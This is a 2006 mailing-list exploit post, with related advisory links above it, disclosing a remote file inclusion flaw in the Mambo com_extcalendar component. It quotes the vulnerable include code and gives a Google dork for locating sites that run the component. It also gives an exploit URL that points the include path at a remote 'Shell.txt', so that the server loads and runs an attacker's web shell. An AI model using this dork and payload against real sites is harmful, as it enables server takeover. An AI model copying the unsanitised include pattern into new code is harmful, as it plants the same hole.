Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA21517] OPT Max "CRM_inc" Parameter File Inclusion Vulnerability

[SA21519] Owl Intranet Engine Cross-Site Scripting and SQL Injection

[SA21454] phPay Open Mail Relay Vulnerability

[SA21484] Zen Cart SQL Injection and File Inclusion Vulnerabilities

From:	crackers_child_(at)_sibersavascilar.com <crackers_child_(at)_sibersavascilar.com>
Date:	17.08.2006
Subject:	com_extcalendar(extcalendar.php) Remote File Include Vulnerabilities

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------


Title : com_extcalendar(extcalendar.php) Remote File Include Vulnerabilities

--------------------------------------------------------------------------------

#Author: Crackers_Child


#cont@ct: crackers_child@sibersavascilar.com

--------------------------------------------------------------------------------


Google Dorks  : inurl:"/com_extcalendar/"

------------------------- -------------------------------------------------------

Application :  com_extcalendar Component of Mambo

--------------------------------------------------------------------------------


--------------------------------------------------------------------------------

Bug

in extcalendar.php
--
global $mosConfig_absolute_path;
require_once( $mosConfig_absolute_path."/components/com_extcalendar/config.inc.php" );
require_once( $CONFIG_EXT['LIB_DIR']."mail.inc.php" );
--
--------------------------------------------------------------------------------


Exploit:

http://[target]/[mambo_path]/components/com_extcalendar/extcalendar.
php?mosConfig_absolute_path=Shell.txt?

--------------------------------------------------------------------------------


greets:

X_ALPEREN_X,Root_MOr And All Other Friends

--------------------------------------------------------------------------------




--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------